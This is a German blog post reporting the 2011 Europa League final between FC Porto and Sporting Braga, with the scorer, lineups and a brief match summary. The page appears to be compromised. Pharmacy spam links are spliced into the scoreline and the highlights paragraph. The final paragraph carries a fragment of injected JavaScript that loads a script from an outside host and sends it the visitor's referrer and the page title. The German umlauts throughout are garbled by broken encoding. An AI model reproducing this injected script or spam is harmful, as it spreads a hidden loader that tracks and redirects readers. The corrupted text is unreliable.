Willkommen auf » EL 2010/11 Highlights FC Porto – Sporting Braga
19. Mai 2011

EL 2010/11 Highlights FC Porto – Sporting Braga

Europa League 2010/11 Finale
FC Porto – Sporting Braga 1:0

1:0 Cheap Pills Radamel Falcao (44., Kopfball, Vorlage Guarin)
vor 47.000 Zuschauern im Aviva-Stadium in Dublin

Aufstellung Porto: Helton – Sapunaru, Rolando, Otamendi, Alvaro Pereira – Fernando – Guarin (73. Belluschi), Joao Moutinho – Hulk, Silvestre Varela (79. James Rodriguez) – Falcao

Aufstellung Braga: Artur – Miguel Garcia, Paulao, Rodriguez (46. Kaka), Silvio – Custodio, Vandinho – Hugo Viana (46. Marcio Mossoro) – Alan, Paulo Cesar – Lima (66. Meyong)

Die Zusammenfassung des Spiels…
Order nexium lawsuit online Purchase order clarina english subscheap pills
AuAYerdem auch hier purchase yougaramdewbaba http://es-home.ch/2018/03/19/shingles-pain-treatment-neurontin/ , hier Cheap und cheapest tadacip online how much lithium orotate should i take hier zu sehen

Ein eher unspektakulAi??res rein portugiesisches Europa League Finale mit einem verdienten FC Porto als Sieger. Sie investierten A?ber 90 Minuten deutlich mehr ins Spiel und brachten Braga Ai??fter unter BedrAi??ngnis. Die hielten mit zum Teil grenzwertiger HAi??rte dagegen (5 Gelbe Karten), blieben jedoch fA?r einen Finalisten erschreckend harmlos im Spiel nach vorn und versiebten die wenigen Torchancen, die sie sich erarbeiteten, auch noch Ai??uAYerst klAi??glich. So konnte Portos MittelstA?rmer Falcao kurz vor der Halbzeit zum einzigen und entscheidenden Tor des Abends einkAi??pfen (er kommt damit auf unglaubliche 17 Europapokaltore in dieser Saison, Rekord!).

FA?r Porto ist es der fA?nfte groAYe europAi??ische Titel nach den Champions League Siegen 1987 und 2004, dem Erfolg im UEFA-Cup 2003 und dem UEFA Super Cup 1987.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;


Einen Kommentar schreiben